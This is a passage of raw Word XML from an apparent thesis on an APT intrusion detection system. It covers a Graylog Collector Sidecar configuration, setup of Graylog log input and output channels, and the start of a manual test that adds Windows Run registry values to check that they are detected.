          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"ab"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        logFile.write(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[{0}_{1}] "</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.format(computerName, windowsVersion) + data+</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        logFile.close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A23CE" w:rsidRPr="003A23CE" w:rsidRDefault="003A23CE" w:rsidP="003A23CE">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22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B81AF2" w:rsidRDefault="003A23CE" w:rsidP="00B81AF2">
      <w:r>
        <w:t>As we discussed before, Server will store log with the filename format as “Computer Name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>”.“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Windows Version”.logs .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A23CE" w:rsidRDefault="003A23CE" w:rsidP="003A23CE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Graylog Collector Sidecar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C00E3F" w:rsidRDefault="00C00E3F" w:rsidP="00C00E3F">
      <w:r>
        <w:t>In DLCH, we implemented Graylog Collector Sidecar for collecting log and sending to Graylog Server.</w:t>
      </w:r>
      <w:r w:rsidR="00067ED0">
        <w:t xml:space="preserve"> Graylog Collector Sidecar is configured to communicate with Graylog Server at Rest API (port 9000). In this thesis, we use Filebeat as the working backend for working with Graylog Server.</w:t>
      </w:r>
      <w:r w:rsidR="00C92C7D">
        <w:t xml:space="preserve"> The configuration file is stored in </w:t>
      </w:r>
      <w:r w:rsidR="00C92C7D" w:rsidRPr="00C92C7D">
        <w:t>/etc/graylog/collector-sidecar/collector_sidecar.yml</w:t>
      </w:r>
      <w:r w:rsidR="00C92C7D">
        <w:t xml:space="preserve"> which contains the following options.</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server_url: http://</w:t>
      </w:r>
      <w:r w:rsidR="00C92C7D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&lt;Graylog-server-ip&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00067ED0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>:9000/api/</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update_interval: 10</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tls_skip_verify: false</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send_status: true</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list_log_files:</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node_id: graylog-collector-sidecar</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collector_id: file:/etc/graylog/collector-sidecar/collector-id</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cache_path: /var/cache/graylog/collector-sidecar</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log_path: /var/log/graylog/collector-sidecar</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log_rotation_time: 86400</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log_max_age: 604800</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tags:</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 apt_1</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backends:</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 name: nxlog</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enabled: false</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binary_path: /usr/bin/nxlog</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      configuration_path: /etc/graylog/collector-sidecar/generated/nxlog.conf</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 name: filebeat</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enabled: true</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binary_path: /usr/bin/filebeat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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configuration_path: /etc/graylog/collector-sidecar/generated/filebeat.yml</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p>
    <w:p w:rsidR="00BA1B83" w:rsidRDefault="0047170D" w:rsidP="0047170D">
      <w:r>
        <w:t xml:space="preserve">Graylog Collector Sidecar </w:t>
      </w:r>
      <w:r w:rsidR="00C92C7D">
        <w:t xml:space="preserve">defines </w:t>
      </w:r>
      <w:r>
        <w:t>some essential information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047170D" w:rsidRDefault="0047170D" w:rsidP="0047170D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">server_url: </w:t>
      </w:r>
      <w:r w:rsidR="00CF1493">
        <w:t>The URL path Graylog Collector Sidecar uses to communicate with Graylog Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF1493" w:rsidRDefault="00CF1493" w:rsidP="0047170D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tags: The tags name of this current log stream. Each log stream can </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067ED0" w:rsidRDefault="00D907E1" w:rsidP="00D907E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>backends: Working backends used for communicating with Graylog Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C92C7D" w:rsidRDefault="00C92C7D" w:rsidP="00C92C7D">
      <w:r>
        <w:t>Graylog Collector Sidecar does not specify any file or directory for collecting log, it will receive the configuration for file and folder input when connects to the Graylog server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D907E1" w:rsidRPr="00BA1B83" w:rsidRDefault="00D907E1" w:rsidP="00D907E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F73B87" w:rsidRDefault="00F73B87">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EA71C0" w:rsidRDefault="00C92C7D" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc485303752"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Centralized Log Storage System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w:rsidR="00C92C7D" w:rsidRDefault="00C92C7D" w:rsidP="00C92C7D">
      <w:r>
        <w:t>We implement Graylog Server as CLSS for storing log sent from DLCH. Graylog virtual machine image can be downloaded from the official site. After installing Graylog image, we configure it to work with Graylog Collector Sidecar in DLCH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C92C7D" w:rsidRDefault="00F73B87" w:rsidP="00F73B87">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To receive incoming log data from DLCH, we create a log input which use Beats as the </w:t>
      </w:r>
      <w:r w:rsidR="00280207">
        <w:t>framework. We set the binding address to local, which is 0.0.0.0 and port to 5044.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00280207" w:rsidRDefault="00280207" w:rsidP="00280207">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00280207">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="444219C5" wp14:editId="216C8CF8">
            <wp:extent cx="5581650" cy="4681220"/>
            <wp:effectExtent l="19050" t="19050" r="1905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650" cy="4681220"/>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oftEdge rad="0"/>
                    </a:effectLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00280207" w:rsidRPr="00280207" w:rsidRDefault="00280207" w:rsidP="00280207">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc485303779"/>
      <w:r w:rsidRPr="00280207">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1</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00280207">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create an input for Graylog server using Beats framework.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w:rsidR="00280207" w:rsidRDefault="00280207">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00280207" w:rsidRDefault="00280207" w:rsidP="00280207">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This input creates a channel for Graylog to receive log data from DLCH via Filebeats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF4742" w:rsidRDefault="00280207" w:rsidP="00BF4742">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="399F09EC" wp14:editId="799D7BFB">
            <wp:extent cx="5581650" cy="2794635"/>
            <wp:effectExtent l="19050" t="19050" r="19050"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1650" cy="2794635"/>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280207" w:rsidRPr="00BF4742" w:rsidRDefault="00BF4742" w:rsidP="00BF4742">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc485303780"/>
      <w:r w:rsidRPr="00BF4742">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2</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BF4742">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog</w:t>
      </w:r>
      <w:r w:rsidR="00FA24D9">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> input</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4742">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> channel for receiving data from DLCH via Filebeats</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w:rsidR="00280207" w:rsidRDefault="00E53574" w:rsidP="00F73B87">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To display the log in dashboard, Graylog server </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> be configured an output channel which used the input described above. For</w:t>
      </w:r>
      <w:r w:rsidR="00200338">
        <w:t xml:space="preserve"> each collector connect to Graylog server, we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00200338">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00200338">
        <w:t xml:space="preserve"> indicate 2 channels for its functionalities: an input channel and an output channel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00200338">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3377E2F0" wp14:editId="1C0B6BDD">
            <wp:extent cx="5581650" cy="320992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1650" cy="3209925"/>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E53574" w:rsidRPr="00200338" w:rsidRDefault="00200338" w:rsidP="00200338">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc485303781"/>
      <w:r w:rsidRPr="00200338">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3</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00200338">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configure input and output channel for each</w:t>
      </w:r>
      <w:r w:rsidR="00AF7236">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> DLCH’s</w:t>
      </w:r>
      <w:r w:rsidRPr="00200338">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> collector</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00200338">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00F73B87">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Configure the Input Channel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00200338">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="190ACB05" wp14:editId="1430A9D7">
            <wp:extent cx="5553075" cy="7591425"/>
            <wp:effectExtent l="19050" t="19050" r="28575"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53075" cy="7591425"/>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200338" w:rsidRPr="00AF7236" w:rsidRDefault="00200338" w:rsidP="00AF7236">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc485303782"/>
      <w:r w:rsidRPr="00AF7236">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4</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00AF7236" w:rsidRPr="00AF7236">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create Input channel for DLCH’s collector</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00F73B87">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00F73B87">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Configure the Output Channel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94909" w:rsidRDefault="00200338" w:rsidP="00A94909">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DA7A322" wp14:editId="732A188E">
            <wp:extent cx="5581650" cy="3117850"/>
            <wp:effectExtent l="19050" t="19050" r="1905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1650" cy="3117850"/>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200338" w:rsidRDefault="00A94909" w:rsidP="00A94909">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc485303783"/>
      <w:r w:rsidRPr="00A94909">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5</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A94909">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create Output channel for DLCH’s collector</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w:rsidR="00C425FC" w:rsidRDefault="00A94909" w:rsidP="00A94909">
      <w:r>
        <w:t xml:space="preserve">We create an Output channel for each DLCH’s collector, then we create the Input channel which forwards log data to the output channel. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94909" w:rsidRDefault="00A94909" w:rsidP="00C425FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The log path for collecting is set to “/home/hungio/APTLogs/*.log” which indicates that Graylog Collector Sidecar will read into the directory name “APTLogs” and read all the file with the extension is “.log”. “APTLogs” is also the directory where DLCH stores the log files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C425FC" w:rsidRDefault="00C425FC" w:rsidP="00C425FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The update interval is set to 5 seconds which indicates Graylog Collector to read the files every 5 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F1A" w:rsidRDefault="00C425FC" w:rsidP="00C425FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The encoding format is set to “utf-8” indicating that the log files to be read use utf-8 format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F1A" w:rsidRDefault="00326F1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F1A" w:rsidRDefault="00326F1A" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc485303753"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>APTIDS Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w:rsidR="00C425FC" w:rsidRDefault="00326F1A" w:rsidP="00326F1A">
      <w:r>
        <w:t xml:space="preserve">In this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>section</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we demonstrate the experiments have been processed with APTIDS. There are three tests used for </w:t>
      </w:r>
      <w:r w:rsidR="00061DAF">
        <w:t>qualifying APTIDS functionalities: The manual test in which we create registry keys and services manually; the real case test in which we run some sample of malware for capture its activities added to service and registry database; and the final one is the test using Sentry for overall forensic the whole system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F1A" w:rsidRDefault="00061DAF" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc485303754"/>
      <w:r>
        <w:t>Manual testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00061DAF" w:rsidRDefault="00061DAF" w:rsidP="00061DAF">
      <w:r>
        <w:t>For testing APTIDS handily, we create and modify some registry keys and services according to the table below.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5244"/>
        <w:gridCol w:w="1981"/>
      </w:tblGrid>
      <w:tr w:rsidR="00061DAF" w:rsidTr="00297A98">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00061DAF" w:rsidRPr="00061DAF" w:rsidRDefault="00061DAF" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00061DAF">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5244" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00061DAF" w:rsidRPr="00061DAF" w:rsidRDefault="00061DAF" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00061DAF">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00061DAF" w:rsidRPr="00061DAF" w:rsidRDefault="00061DAF" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00061DAF">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00061DAF" w:rsidTr="00297A98">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1545" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00061DAF" w:rsidRDefault="00061DAF" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5244" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00297A98" w:rsidRDefault="00061DAF" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Add Registry key:</w:t>
            </w:r>
            <w:r w:rsidR="00AD0CD2">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AD0CD2" w:rsidRPr="00AD0CD2">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>New Value #1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00061DAF" w:rsidRDefault="00297A98" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HKLM/Software/Microsoft/Windows/Current Version/Run/ </w:t>
            </w:r>
            <w:r w:rsidR="00061DAF">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00061DAF" w:rsidRDefault="00297A98" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Action</w:t>
            </w:r>
            <w:r w:rsidR="00061DAF">
              <w:t xml:space="preserve"> Captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00061DAF" w:rsidTr="00297A98">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1545" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00061DAF" w:rsidRDefault="00061DAF" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5244" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00297A98" w:rsidRDefault="0005024F" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Add Registry key name: </w:t>
            </w:r>
            <w:r w:rsidRPr="0005024F">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>New Value #2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00061DAF" w:rsidRDefault="00297A98" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HK</w:t>
            </w:r>
            <w:r w:rsidR="00F533E7">
              <w:t>LM</w:t>
            </w:r>
            <w:r>
              <w:t>/Software/Microsoft/Widnows/Current Version/Run/</w:t>
            </w:r>
            <w:r w:rsidR="00061DAF">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00061DAF" w:rsidRDefault="00297A98" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Action</w:t>
            </w:r>
            <w:r w:rsidR="00061DAF">
              <w:t xml:space="preserve"> Captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00061DAF" w:rsidTr="00297A98">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1545" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00061DAF" w:rsidRDefault="00061DAF" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Modify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5244" w:type="dxa"/>
          </w:tcPr>
